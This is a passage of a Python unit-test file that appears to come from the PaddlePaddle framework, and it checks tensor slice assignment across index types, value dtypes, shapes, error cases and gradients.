        self._get_answer()
        error_msg = "\nIn {} mode: \nExpected res = \n{}, \n\nbut received : \n{}"
        self.assertTrue(
            (self.data == static_out).all(),
            msg=error_msg.format("static", self.data, static_out))
        self.assertTrue(
            (self.data == dynamic_out).all(),
            msg=error_msg.format("dynamic", self.data, dynamic_out))
# 1. Test different type of item: int, Python slice, Paddle Tensor
# 1.1 item is int
class TestSetValueItemInt(TestSetValueApi):
    """Item is a single int: x[0] = value."""

    def _call_setitem(self, x):
        x[0] = self.value

    def _get_answer(self):
        self.data[0] = self.value
# 1.2 item is slice
# 1.2.1 step is 1
class TestSetValueItemSlice(TestSetValueApi):
    """Simple slice with step 1: x[0:2] = value."""

    def _call_setitem(self, x):
        x[0:2] = self.value

    def _get_answer(self):
        self.data[0:2] = self.value
class TestSetValueItemSlice2(TestSetValueApi):
    """Slice with a negative end: x[0:-1] = value."""

    def _call_setitem(self, x):
        x[0:-1] = self.value

    def _get_answer(self):
        self.data[0:-1] = self.value
class TestSetValueItemSlice3(TestSetValueApi):
    """Slices on two axes: x[0:-1, 0:2] = value."""

    def _call_setitem(self, x):
        x[0:-1, 0:2] = self.value

    def _get_answer(self):
        self.data[0:-1, 0:2] = self.value
class TestSetValueItemSlice4(TestSetValueApi):
    """Open-ended slices on all three axes: x[0:, 1:2, :] = value."""

    def _call_setitem(self, x):
        x[0:, 1:2, :] = self.value

    def _get_answer(self):
        self.data[0:, 1:2, :] = self.value
class TestSetValueItemSlice5(TestSetValueApi):
    """Empty slice on the middle axis (no elements assigned): x[0:, 1:1, :]."""

    def _call_setitem(self, x):
        x[0:, 1:1, :] = self.value

    def _get_answer(self):
        self.data[0:, 1:1, :] = self.value
class TestSetValueItemSliceInWhile(TestSetValueApi):
    """__setitem__ with a tensor index inside a while_loop body."""

    def _call_setitem(self, x):
        def cond(i, x):
            return i < 1

        def body(i, x):
            # assign at the loop-variable index, then advance
            x[i] = self.value
            i = i + 1
            return i, x

        i = paddle.zeros(shape=(1, ), dtype='int32')
        i, x = paddle.fluid.layers.while_loop(cond, body, [i, x])

    def _get_answer(self):
        # the loop runs exactly once, writing index 0
        self.data[0] = self.value
# 1.2.2 step > 1
class TestSetValueItemSliceStep(TestSetValueApi):
    """Slice with step > 1: x[0:2:2] = value."""

    def set_shape(self):
        self.shape = [5, 5, 5]

    def _call_setitem(self, x):
        x[0:2:2] = self.value

    def _get_answer(self):
        self.data[0:2:2] = self.value
class TestSetValueItemSliceStep2(TestSetValueApi):
    """Negative end with step 3: x[0:-1:3] = value."""

    def set_shape(self):
        self.shape = [7, 5, 5]

    def _call_setitem(self, x):
        x[0:-1:3] = self.value

    def _get_answer(self):
        self.data[0:-1:3] = self.value
class TestSetValueItemSliceStep3(TestSetValueApi):
    """Stepped slice on the last axis: x[0:-1, 0:2, ::2] = value."""

    def _call_setitem(self, x):
        x[0:-1, 0:2, ::2] = self.value

    def _get_answer(self):
        self.data[0:-1, 0:2, ::2] = self.value
class TestSetValueItemSliceStep4(TestSetValueApi):
    """Stepped slice on the middle axis: x[0:, 1:2:2, :] = value."""

    def _call_setitem(self, x):
        x[0:, 1:2:2, :] = self.value

    def _get_answer(self):
        self.data[0:, 1:2:2, :] = self.value
# 1.2.3 step < 0
class TestSetValueItemSliceNegetiveStep(TestSetValueApi):
    """Negative step with out-of-range start: x[5:2:-1] = array value."""

    def set_shape(self):
        self.shape = [5, 2]

    def set_value(self):
        self.value = np.array([3, 4])

    def _call_setitem(self, x):
        x[5:2:-1] = self.value

    def _get_answer(self):
        self.data[5:2:-1] = self.value
class TestSetValueItemSliceNegetiveStep2(TestSetValueApi):
    """Negative step with open start: x[1::-1] = array value."""

    def set_shape(self):
        self.shape = [5]

    def set_value(self):
        self.value = np.array([3, 4])

    def _call_setitem(self, x):
        x[1::-1] = self.value

    def _get_answer(self):
        self.data[1::-1] = self.value
class TestSetValueItemSliceNegetiveStep3(TestSetValueApi):
    """Full reverse slice: x[::-1] = array value."""

    def set_shape(self):
        self.shape = [3]

    def set_value(self):
        self.value = np.array([3, 4, 5])

    def _call_setitem(self, x):
        x[::-1] = self.value

    def _get_answer(self):
        self.data[::-1] = self.value
class TestSetValueItemSliceNegetiveStep4(TestSetValueApi):
    """Negative steps mixed across axes: x[2:0:-1, 0:2, ::-1] = value."""

    def set_shape(self):
        self.shape = [3, 4, 5]

    def _call_setitem(self, x):
        x[2:0:-1, 0:2, ::-1] = self.value

    def _get_answer(self):
        self.data[2:0:-1, 0:2, ::-1] = self.value
# 1.3 item is Ellipsis
class TestSetValueItemEllipsis1(TestSetValueApi):
    """Ellipsis between slices: x[0:, ..., 1:] = value."""

    def _call_setitem(self, x):
        x[0:, ..., 1:] = self.value

    def _get_answer(self):
        self.data[0:, ..., 1:] = self.value
class TestSetValueItemEllipsis2(TestSetValueApi):
    """Trailing ellipsis: x[0:, ...] = value."""

    def _call_setitem(self, x):
        x[0:, ...] = self.value

    def _get_answer(self):
        self.data[0:, ...] = self.value
class TestSetValueItemEllipsis3(TestSetValueApi):
    """Leading ellipsis: x[..., 1:] = value."""

    def _call_setitem(self, x):
        x[..., 1:] = self.value

    def _get_answer(self):
        self.data[..., 1:] = self.value
class TestSetValueItemEllipsis4(TestSetValueApi):
    """Bare ellipsis (assign everything): x[...] = value."""

    def _call_setitem(self, x):
        x[...] = self.value

    def _get_answer(self):
        self.data[...] = self.value
# 1.4 item is Paddle Tensor
class TestSetValueItemTensor(TestSetValueApi):
    """Item is a paddle Tensor scalar index: x[zero] = value."""

    def _call_setitem(self, x):
        zero = paddle.full([1], 0, dtype="int32")
        x[zero] = self.value

    def _get_answer(self):
        self.data[0] = self.value
class TestSetValueItemTensor2(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:two] = self.value
def _get_answer(self):
self.data[0:2] = self.value
class TestSetValueItemTensor3(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:-1, 0:two] = self.value
def _get_answer(self):
self.data[0:-1, 0:2] = self.value
class TestSetValueItemTensor4(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[0:-1, zero:2, 0:6:two] = self.value
def _get_answer(self):
self.data[0:-1, 0:2, ::2] = self.value
class TestSetValueItemTensor5(TestSetValueApi):
def _call_setitem(self, x):
zero = paddle.full([1], 0, dtype="int32")
two = paddle.full([1], 2, dtype="int64")
x[zero:, 1:2:two, :] = self.value
def _get_answer(self):
self.data[0:, 1:2:2, :] = self.value
class TestSetValueItemTensor6(TestSetValueApi):
def set_shape(self):
self.shape = [3, 4, 5]
def _call_setitem(self, x):
minus1 = paddle.full([1], -1, dtype="int32")
zero = paddle.full([1], 0, dtype="int32")
x[2:zero:minus1, 0:2, 10:-6:minus1] = self.value
def _get_answer(self):
self.data[2:0:-1, 0:2, ::-1] = self.value
# 1.5 item is None
# None in the index inserts a new axis (numpy newaxis semantics); the last
# four cases also reshape the assigned value to match.
class TestSetValueItemNone1(TestSetValueApi):
    def _call_setitem(self, x):
        x[None] = self.value
    def _get_answer(self):
        self.data[None] = self.value
class TestSetValueItemNone2(TestSetValueApi):
    def _call_setitem(self, x):
        x[0, None, 1] = self.value
    def _get_answer(self):
        self.data[0, None, 1] = self.value
class TestSetValueItemNone3(TestSetValueApi):
    def _call_setitem(self, x):
        x[:, None, None, 1] = self.value
    def _get_answer(self):
        self.data[:, None, None, 1] = self.value
class TestSetValueItemNone4(TestSetValueApi):
    def _call_setitem(self, x):
        x[0, 0, None, 1] = self.value
    def _get_answer(self):
        self.data[0, 0, None, 1] = self.value
class TestSetValueItemNone5(TestSetValueApi):
    def _call_setitem(self, x):
        x[0, None, 0, None, 1] = self.value
    def _get_answer(self):
        self.data[0, None, 0, None, 1] = self.value
class TestSetValueItemNone6(TestSetValueApi):
    def _call_setitem(self, x):
        x[None, 0, 0, None, 0] = self.value
    def _get_answer(self):
        self.data[None, 0, 0, None, 0] = self.value
class TestSetValueItemNone7(TestSetValueApi):
    def _call_setitem(self, x):
        x[:, None, 1] = np.zeros(self.shape)[:, None, 0]
    def _get_answer(self):
        self.data[:, None, 1] = np.zeros(self.shape)[:, None, 0]
class TestSetValueItemNone8(TestSetValueApi):
    def _call_setitem(self, x):
        x[:, 1, None] = np.zeros(self.shape)[:, 0, None]
    def _get_answer(self):
        self.data[:, 1, None] = np.zeros(self.shape)[:, 0, None]
class TestSetValueItemNone9(TestSetValueApi):
    def _call_setitem(self, x):
        x[None, :, 1, ..., None] = np.zeros(self.shape)[0, 0, :, None]
    def _get_answer(self):
        self.data[None, :, 1, ..., None] = np.zeros(self.shape)[0, 0, :, None]
class TestSetValueItemNone10(TestSetValueApi):
    def _call_setitem(self, x):
        x[..., None, :, None] = np.zeros(self.shape)[..., None, :, None]
    def _get_answer(self):
        self.data[..., None, :, None] = np.zeros(self.shape)[..., None, :, None]
# 1.6 item is list or Tensor of bool
# Boolean-mask indexing, as a Python list of bools or a paddle bool Tensor.
class TestSetValueItemBool1(TestSetValueApi):
    def _call_setitem(self, x):
        x[[True, False]] = self.value
    def _get_answer(self):
        self.data[[True, False]] = self.value
class TestSetValueItemBool2(TestSetValueApi):
    def _call_setitem(self, x):
        # All-False mask: nothing is written.
        x[[False, False]] = self.value
    def _get_answer(self):
        self.data[[False, False]] = self.value
class TestSetValueItemBool3(TestSetValueApi):
    def _call_setitem(self, x):
        x[[False, True]] = np.zeros(self.shape[2])
    def _get_answer(self):
        self.data[[False, True]] = np.zeros(self.shape[2])
class TestSetValueItemBool4(TestSetValueApi):
    def _call_setitem(self, x):
        idx = paddle.assign(np.array([False, True]))
        x[idx] = np.zeros(self.shape[2])
    def _get_answer(self):
        self.data[np.array([False, True])] = np.zeros(self.shape[2])
class TestSetValueItemBool5(TestSetValueApi):
    def _call_setitem(self, x):
        # 2-D boolean mask selecting elements across the first two axes.
        idx = paddle.assign(
            np.array([[False, True, False], [True, True, False]]))
        x[idx] = self.value
    def _get_answer(self):
        self.data[np.array([[False, True, False], [True, True, False]
                            ])] = self.value
class TestSetValueItemBool6(TestSetValueApi):
    def _call_setitem(self, x):
        # Mask computed from the tensor itself (x > 0).
        x[0, ...] = 0
        x[x > 0] = self.value
    def _get_answer(self):
        self.data[0, ...] = 0
        self.data[self.data > 0] = self.value
# 2. Test different type of value: int, float, numpy.ndarray, Tensor
# 2.1 value is int32, int64, float32, float64, bool
def create_test_value_int32(parent):
    """Derive a variant of *parent* that assigns the Python int 7 into an
    "int32" tensor, and register it in this module's globals under the name
    "<Parent>_ValueInt32"."""
    class _Variant(parent):
        def set_value(self):
            self.value = 7
        def set_dtype(self):
            self.dtype = "int32"
    registered_name = parent.__name__ + "_" + "ValueInt32"
    _Variant.__name__ = registered_name
    globals()[registered_name] = _Variant
# Register int32-scalar-value variants for the basic int/slice item tests.
create_test_value_int32(TestSetValueItemInt)
create_test_value_int32(TestSetValueItemSlice)
create_test_value_int32(TestSetValueItemSlice2)
create_test_value_int32(TestSetValueItemSlice3)
create_test_value_int32(TestSetValueItemSlice4)
# Factory pattern: each create_test_value_* derives a subclass of `parent`
# overriding set_value/set_dtype, renames it "<Parent>_<Suffix>" and
# registers it in module globals so unittest discovers it.
def create_test_value_int64(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = 7
        def set_dtype(self):
            self.dtype = "int64"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueInt64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_int64(TestSetValueItemInt)
create_test_value_int64(TestSetValueItemSlice)
create_test_value_int64(TestSetValueItemSlice2)
create_test_value_int64(TestSetValueItemSlice3)
create_test_value_int64(TestSetValueItemSlice4)
def create_test_value_fp32(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = 3.3
        def set_dtype(self):
            self.dtype = "float32"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueFp32")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_fp32(TestSetValueItemInt)
create_test_value_fp32(TestSetValueItemSlice)
create_test_value_fp32(TestSetValueItemSlice2)
create_test_value_fp32(TestSetValueItemSlice3)
create_test_value_fp32(TestSetValueItemSlice4)
def create_test_value_fp64(parent):
    class TestValueInt(parent):
        def set_value(self):
            # Value outside float32 range, to exercise real float64 storage.
            self.value = 2.0**127  # float32:[-2^128, 2^128)
        def set_dtype(self):
            self.dtype = "float64"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueFp64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_fp64(TestSetValueItemInt)
create_test_value_fp64(TestSetValueItemSlice)
create_test_value_fp64(TestSetValueItemSlice2)
create_test_value_fp64(TestSetValueItemSlice3)
create_test_value_fp64(TestSetValueItemSlice4)
def create_test_value_bool(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = 0
        def set_dtype(self):
            self.dtype = "bool"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueBool")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_bool(TestSetValueItemInt)
create_test_value_bool(TestSetValueItemSlice)
create_test_value_bool(TestSetValueItemSlice2)
create_test_value_bool(TestSetValueItemSlice3)
create_test_value_bool(TestSetValueItemSlice4)
# 2.2 value is numpy.array (int32, int64, float32, float64, bool)
# Same factory pattern as 2.1, but the assigned value is a numpy array.
def create_test_value_numpy_int32(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = np.array([5])
        def set_dtype(self):
            self.dtype = "int32"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyInt32")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_numpy_int32(TestSetValueItemInt)
create_test_value_numpy_int32(TestSetValueItemSlice)
create_test_value_numpy_int32(TestSetValueItemSlice2)
create_test_value_numpy_int32(TestSetValueItemSlice3)
create_test_value_numpy_int32(TestSetValueItemSlice4)
def create_test_value_numpy_int64(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = np.array([1])
        def set_dtype(self):
            self.dtype = "int64"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyInt64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_numpy_int64(TestSetValueItemInt)
create_test_value_numpy_int64(TestSetValueItemSlice)
create_test_value_numpy_int64(TestSetValueItemSlice2)
create_test_value_numpy_int64(TestSetValueItemSlice3)
create_test_value_numpy_int64(TestSetValueItemSlice4)
def create_test_value_numpy_fp32(parent):
    class TestValueInt(parent):
        def set_value(self):
            # NOTE(review): integer array assigned into a float32 tensor —
            # presumably exercising the implicit cast; confirm intent.
            self.value = np.array([1])
        def set_dtype(self):
            self.dtype = "float32"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyFp32")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_numpy_fp32(TestSetValueItemInt)
create_test_value_numpy_fp32(TestSetValueItemSlice)
create_test_value_numpy_fp32(TestSetValueItemSlice2)
create_test_value_numpy_fp32(TestSetValueItemSlice3)
create_test_value_numpy_fp32(TestSetValueItemSlice4)
def create_test_value_numpy_fp64(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = np.array([2**127]).astype("float64")
        def set_dtype(self):
            self.dtype = "float64"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyFp64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_numpy_fp64(TestSetValueItemInt)
create_test_value_numpy_fp64(TestSetValueItemSlice)
create_test_value_numpy_fp64(TestSetValueItemSlice2)
create_test_value_numpy_fp64(TestSetValueItemSlice3)
create_test_value_numpy_fp64(TestSetValueItemSlice4)
def create_test_value_numpy_bool(parent):
    class TestValueInt(parent):
        def set_value(self):
            self.value = np.array([0])
        def set_dtype(self):
            self.dtype = "bool"
    cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyBool")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_numpy_bool(TestSetValueItemInt)
create_test_value_numpy_bool(TestSetValueItemSlice)
create_test_value_numpy_bool(TestSetValueItemSlice2)
create_test_value_numpy_bool(TestSetValueItemSlice3)
create_test_value_numpy_bool(TestSetValueItemSlice4)
# 2.3 value is a Paddle Tensor (int32, int64, float32, float64, bool)
# These factories also override _call_setitem/_get_answer: the value is a
# 1-element paddle Tensor assigned into x[0, 1].
def create_test_value_tensor_int32(parent):
    class TestValueInt(parent):
        def set_dtype(self):
            self.dtype = "int32"
        def _call_setitem(self, x):
            value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
            x[0, 1] = value
        def _get_answer(self):
            self.data[0, 1] = 3
    cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorInt32")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_tensor_int32(TestSetValueItemInt)
create_test_value_tensor_int32(TestSetValueItemSlice)
create_test_value_tensor_int32(TestSetValueItemSlice2)
create_test_value_tensor_int32(TestSetValueItemSlice3)
create_test_value_tensor_int32(TestSetValueItemSlice4)
def create_test_value_tensor_int64(parent):
    class TestValueInt(parent):
        def set_dtype(self):
            self.dtype = "int64"
        def _call_setitem(self, x):
            value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
            x[0, 1] = value
        def _get_answer(self):
            self.data[0, 1] = 3
    cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorInt64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_tensor_int64(TestSetValueItemInt)
create_test_value_tensor_int64(TestSetValueItemSlice)
create_test_value_tensor_int64(TestSetValueItemSlice2)
create_test_value_tensor_int64(TestSetValueItemSlice3)
create_test_value_tensor_int64(TestSetValueItemSlice4)
def create_test_value_tensor_fp32(parent):
    class TestValueInt(parent):
        def set_dtype(self):
            self.dtype = "float32"
        def _call_setitem(self, x):
            value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
            x[0, 1] = value
        def _get_answer(self):
            self.data[0, 1] = 3
    cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorFp32")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_tensor_fp32(TestSetValueItemInt)
create_test_value_tensor_fp32(TestSetValueItemSlice)
create_test_value_tensor_fp32(TestSetValueItemSlice2)
create_test_value_tensor_fp32(TestSetValueItemSlice3)
create_test_value_tensor_fp32(TestSetValueItemSlice4)
def create_test_value_tensor_fp64(parent):
    class TestValueInt(parent):
        def set_dtype(self):
            self.dtype = "float64"
        def _call_setitem(self, x):
            value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
            x[0, 1] = value
        def _get_answer(self):
            self.data[0, 1] = 3
    cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorFp64")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_tensor_fp64(TestSetValueItemInt)
create_test_value_tensor_fp64(TestSetValueItemSlice)
create_test_value_tensor_fp64(TestSetValueItemSlice2)
create_test_value_tensor_fp64(TestSetValueItemSlice3)
create_test_value_tensor_fp64(TestSetValueItemSlice4)
def create_test_value_tensor_bool(parent):
    class TestValueInt(parent):
        def set_dtype(self):
            self.dtype = "bool"
        def _call_setitem(self, x):
            value = paddle.full(shape=[1], fill_value=False, dtype=self.dtype)
            x[0, 1] = value
        def _get_answer(self):
            self.data[0, 1] = False
    cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorBool")
    TestValueInt.__name__ = cls_name
    globals()[cls_name] = TestValueInt
create_test_value_tensor_bool(TestSetValueItemInt)
create_test_value_tensor_bool(TestSetValueItemSlice)
create_test_value_tensor_bool(TestSetValueItemSlice2)
create_test_value_tensor_bool(TestSetValueItemSlice3)
create_test_value_tensor_bool(TestSetValueItemSlice4)
# 3. Test different shape of value
# Broadcasting and exact-shape assignment of numpy arrays / paddle Tensors.
class TestSetValueValueShape1(TestSetValueApi):
    def set_value(self):
        self.value = np.array([3, 4, 5, 6])  # shape is (4,)
    def _call_setitem(self, x):
        x[0] = self.value
    def _get_answer(self):
        self.data[0] = self.value
class TestSetValueValueShape2(TestSetValueApi):
    def set_value(self):
        self.value = np.array([[3, 4, 5, 6]])  # shape is (1,4)
    def _call_setitem(self, x):
        x[0:1] = self.value
    def _get_answer(self):
        self.data[0:1] = self.value
class TestSetValueValueShape3(TestSetValueApi):
    def set_value(self):
        self.value = np.array(
            [[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]])  # shape is (3,4)
    def _call_setitem(self, x):
        x[0] = self.value
    def _get_answer(self):
        self.data[0] = self.value
class TestSetValueValueShape4(TestSetValueApi):
    def set_value(self):
        self.value = np.array(
            [[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]).astype(
                self.dtype)  # shape is (3,4)
    def _call_setitem(self, x):
        # Value is converted to a paddle Tensor before assignment.
        x[0] = paddle.assign(self.value)  # x is Paddle.Tensor
    def _get_answer(self):
        self.data[0] = self.value
class TestSetValueValueShape5(TestSetValueApi):
    def set_value(self):
        self.value = np.array([3, 3, 3]).astype(self.dtype)
    def set_shape(self):
        self.shape = [3, 4]
    def _call_setitem(self, x):
        x[:, 0] = paddle.assign(self.value)  # x is Paddle.Tensor
    def _get_answer(self):
        self.data[:, 0] = self.value
# 4. Test error
class TestError(TestSetValueBase):
    """Error cases of Tensor.__setitem__: unsupported value types, unsupported
    dtypes, zero slice step, repeated ellipsis, bool-index misuse and
    broadcast shape mismatch.

    Uses assertRaisesRegex (assertRaisesRegexp is a deprecated alias removed
    in Python 3.12).
    """
    def _value_type_error(self):
        # Assigning a plain Python list is rejected.
        with self.assertRaisesRegex(
                TypeError,
                "Only support to assign an integer, float, numpy.ndarray or paddle.Tensor"
        ):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            value = [1]
            x[0] = value
    def _dtype_error(self):
        # float16 destination tensors are not supported by set_value.
        with self.assertRaisesRegex(
                TypeError,
                "When assign a numpy.ndarray, integer or float to a paddle.Tensor, "
        ):
            y = paddle.ones(shape=self.shape, dtype="float16")
            y[0] = 1
    def _step_error(self):
        with self.assertRaisesRegex(ValueError, "step can not be 0"):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            x[0:1:0] = self.value
    def _ellipsis_error(self):
        # NOTE(review): this helper is never invoked from test_error below —
        # confirm whether the omission is intentional.
        with self.assertRaisesRegex(
                IndexError, "An index can only have a single ellipsis"):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            x[..., ...] = self.value
        with self.assertRaisesRegex(ValueError, "the start or end is None"):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            one = paddle.ones([1])
            x[::one] = self.value
    def _bool_list_error(self):
        # Mixed bool/int index list is a TypeError; a second bool mask on
        # another axis is an IndexError.
        with self.assertRaises(TypeError):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            x[[True, False, 0]] = 0
        with self.assertRaises(IndexError):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            x[[True, False], [True, False]] = 0
    def _bool_tensor_error(self):
        # Bool mask longer than the indexed axis.
        with self.assertRaises(IndexError):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            idx = paddle.assign([True, False, True])
            x[idx] = 0
    def _broadcast_mismatch(self):
        # The shape mismatch is only detected at program run time.
        program = paddle.static.Program()
        with paddle.static.program_guard(program):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            value = np.array([3, 4, 5, 6, 7])
            x[0] = value
        exe = paddle.static.Executor(paddle.CPUPlace())
        with self.assertRaises(ValueError):
            exe.run(program)
    def test_error(self):
        paddle.enable_static()
        with paddle.static.program_guard(self.program):
            self._value_type_error()
            self._dtype_error()
            self._step_error()
            self._bool_list_error()
            self._bool_tensor_error()
            self._broadcast_mismatch()
# 5. Test backward
class Model(paddle.nn.Layer):
    # Small conv model used by TestBackward.test_dynamic: writes a flattened
    # conv output into a slice of another conv output before reducing to a
    # scalar loss, so gradients must flow through the __setitem__.
    def __init__(self):
        super(Model, self).__init__()
        self.conv = paddle.nn.Conv2D(12, 12, 3)
    def forward(self, x, y):
        x = self.conv(x)
        y = self.conv(y)
        var = y.flatten()
        # In-place slice assignment; the overwritten slice of x should be
        # excluded from x's own gradient.
        x[0, :, 0, 0] = var
        loss = paddle.mean(x)
        return loss, var, x
class TestBackward(unittest.TestCase):
    def test_static(self):
        # Static graph: after z[0, :] = var, the gradient of that row of z
        # must be routed into var.
        paddle.enable_static()
        main_program = paddle.static.Program()
        startup_program = paddle.static.Program()
        x_np = np.random.random(size=(4, 4)).astype('float32')
        y_np = np.random.random(size=(4, 4)).astype('float32')
        label_np = np.random.randint(2, size=(4, 1)).astype('int64')
        with paddle.static.program_guard(main_program, startup_program):
            x = paddle.static.data(name="x", shape=[4, 4], dtype='float32')
            y = paddle.static.data(name="y", shape=[4, 4], dtype='float32')
            label = paddle.static.data(
                name="label", shape=[4, 1], dtype='int64')
            z = paddle.add(x, y)
            var = y[0, :]
            z[0, :] = var
            prediction = paddle.static.nn.fc(x=z, size=2, activation='softmax')
            cost = paddle.nn.functional.cross_entropy(
                input=prediction, label=label)
            loss = paddle.mean(cost)
            sgd = paddle.optimizer.SGD(learning_rate=0.01)
            sgd.minimize(loss)
        exe = paddle.static.Executor(paddle.CPUPlace())
        exe.run(startup_program)
        var_grad, z_grad = exe.run(
            main_program,
            feed={"x": x_np,
                  "y": y_np,
                  "label": label_np},
            fetch_list=[var.name + "@GRAD", z.name + "@GRAD"])
        self.assertTrue((var_grad == z_grad[0, :]).all())
    def test_dynamic(self):
        paddle.disable_static()
        model = Model()
        x = paddle.ones([1, 12, 3, 3]).astype("float32")
        y = paddle.ones([1, 12, 3, 3]).astype("float32")
        loss, var, x = model(x, y)
        loss.backward()
        self.assertTrue(var.grad.shape == x.grad[0, :, 0, 0].shape)
        # The overwritten slice of x receives zero gradient.
        self.assertTrue((0 == x.grad[0, :, 0, 0]).all())
class TestGradientTruncated(unittest.TestCase):
    """Backward of set_value: the overwritten region of the input must get a
    truncated (zero) gradient while the assigned value receives the
    corresponding gradient."""

    def _assert_grad_equal(self, actual, expected, what):
        # Shared assertion. Replaces the previous inline copies whose
        # messages swapped "input"/"value", misspelled "received" and, in
        # case 2, interpolated the arrays from case 1.
        self.assertTrue(
            np.array_equal(actual, expected),
            msg="The gradient of {} should be \n{},\n but received {}".format(
                what, expected, actual))

    def test_consistent_with_competitor(self):
        """Dygraph: compare input/value gradients against hand-computed numpy
        references for several slice patterns."""
        paddle.disable_static()

        def set_value(t, value):
            a = t * t
            a[0, 1] = value
            y = a * a
            return y.sum()

        # case 1
        array = np.arange(
            1, 1 + 2 * 3 * 4, dtype="float32").reshape([1, 2, 1, 3, 1, 4])
        value = np.arange(100, 104, dtype="float32").reshape(1, 4)
        inps = paddle.to_tensor(array, stop_gradient=False)
        value = paddle.to_tensor(value, stop_gradient=False)
        loss = set_value(inps, value)
        loss.backward()
        value_grad = np.array([[600., 606., 612., 618.]])
        input_grad = np.array(
            [[[[[[4., 32., 108., 256.]], [[500., 864., 1372., 2048.]],
                [[2916., 4000., 5324., 6912.]]]],
              [[[[0., 0., 0., 0.]], [[0., 0., 0., 0.]], [[0., 0., 0., 0.]]]]]])
        self._assert_grad_equal(inps.grad.numpy(), input_grad, "input")
        self._assert_grad_equal(value.grad.numpy(), value_grad, "value")

        # case 2
        array = np.arange(1, 2 * 3 * 4 + 1, dtype="float32").reshape([4, 2, 3])
        value = np.arange(100, 100 + 1, dtype="float32")
        inps2 = paddle.to_tensor(array, stop_gradient=False)
        value2 = paddle.to_tensor(value, stop_gradient=False)
        loss = set_value(inps2, value2)
        loss.backward()
        value_grad2 = np.array([600.])
        input_grad2 = np.array(
            [[[4., 32., 108.], [0., 0., 0.]], [[1372., 2048., 2916.],
                                               [4000., 5324., 6912.]],
             [[8788., 10976., 13500.], [16384., 19652., 23328.]],
             [[27436., 32000., 37044.], [42592., 48668., 55296.]]])
        self._assert_grad_equal(inps2.grad.numpy(), input_grad2, "input")
        self._assert_grad_equal(value2.grad.numpy(), value_grad2, "value")

        # case 3
        def set_value3(t, value):
            a = t * t
            a[0, :, 0, :] = value
            y = a * a
            return y.sum()

        array = np.arange(
            1, 1 + 2 * 3 * 4, dtype="float32").reshape([4, 3, 1, 1, 2, 1])
        value = np.arange(100, 100 + 2, dtype="float32").reshape(1, 2, 1)
        inps = paddle.to_tensor(array, stop_gradient=False)
        value = paddle.to_tensor(value, stop_gradient=False)
        loss = set_value3(inps, value)
        loss.backward()
        value_grad = np.array([[[600.], [606.]]])
        input_grad = np.array(
            [[[[[[0.], [0.]]]], [[[[0.], [0.]]]], [[[[0.], [0.]]]]],
             [[[[[1372.], [2048.]]]], [[[[2916.], [4000.]]]],
              [[[[5324.], [6912.]]]]], [[[[[8788.], [10976.]]]], [[[[13500.],
                                                                    [16384.]]]],
                                        [[[[19652.], [23328.]]]]],
             [[[[[27436.], [32000.]]]], [[[[37044.], [42592.]]]],
              [[[[48668.], [55296.]]]]]])
        self._assert_grad_equal(inps.grad.numpy(), input_grad, "input")
        self._assert_grad_equal(value.grad.numpy(), value_grad, "value")

        # case 4: step > 0
        def set_value4(t, value):
            a = t * t
            a[0, :, 0, ::3] = value
            y = a * a
            return y.sum()

        array = np.arange(
            1, 1 + 2 * 3 * 4, dtype="float32").reshape([2, 3, 1, 4, 1])
        value = np.arange(100, 100 + 2, dtype="float32").reshape(1, 2, 1)
